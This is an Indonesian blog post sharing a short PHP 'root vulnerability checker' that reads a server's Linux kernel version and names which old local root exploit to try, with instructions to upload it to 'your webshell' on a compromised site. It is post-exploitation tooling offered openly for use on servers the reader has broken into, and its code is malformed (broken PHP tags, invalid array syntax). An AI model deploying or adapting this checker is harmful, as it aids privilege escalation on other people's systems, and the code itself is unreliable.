Mau share sedikit kode php ajah yang gunanya buat diteksi suatu
web bisa di tembus pake exploit tipe apa buat dapetin ROOT
oke liat ajah
<php $version_kernel=php_uname('r'); $version=explode('-',$version_kernel); echo "SystemKernel: ".php_uname('-a')." "; $exploits = array( 'w00t' => '2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20', 'brk' => '2.4.22','2.4.21','2.4.10','2.4.20', 'elflbl' => '2.4.29', 'expand_stack' => '2.4.29', 'h00lyshit' => '2.6.8','2.6.10','2.6.11','2.6.12', 'kdump' => '2.6.13', 'km2' => '2.4.18','2.4.22', 'krad' => '2.6.11', 'krad3' => '2.6.11','2.6.9', 'local26' =>'2.6.13', 'mremap_pte'=>'2.4.20','2.2.25','2.4.24', 'newlocal'=>'2.4.17','2.4.19', 'ong_bak'=>'2.4.','2.6.', 'ptrace'=>'2.2.24','2.4.22', 'ptrace_kmod'=>'2.4.','2.6.', 'ptrace24'=>'2.4.9', 'pwned'=>'2.4.','2.6.', 'py2'=>'2.6.9','2.6.17','2.6.15','2.6.13', 'raptor_prctl'=>'2.6.13','2.6.17','2.6.16','2.6.13', 'prctl3'=>'2.6.13','2.6.17','2.6.9', 'stackgrow2'=>'2.4.29','2.6.10', 'uselib24'=>'2.4.29','2.6.10','2.4.22','2.4.25', 'exp.sh'=>'2.6.9','2.6.10','2.6.16','2.6.13', 'prctl'=>'2.6.', 'kmdx'=>'2.6.','2.4.' ); $rootexploit = array_search($version[0], $exploits); if ($rootexploit==NULL){ echo 'RootExploit:Tidak ada RootExploit tersebut pada daftar kami'; }else{ echo 'RootExploit:Coba gunakan'.$rootexploit; } >
souce disave dengan bahasa .php
kemudian tinggal di upload di webshell kalian dan untuk database nya bisa di tambahkan sendiri sesuai kreatifitas anda sekalian
karena ini cuma memvalidasi nomor kernel ajah dan di tampung menjadi array(kumpulan) sekian.
0 komentar: di postingan Root vuln Checker [PHP]
0 komentar:
Posting Komentar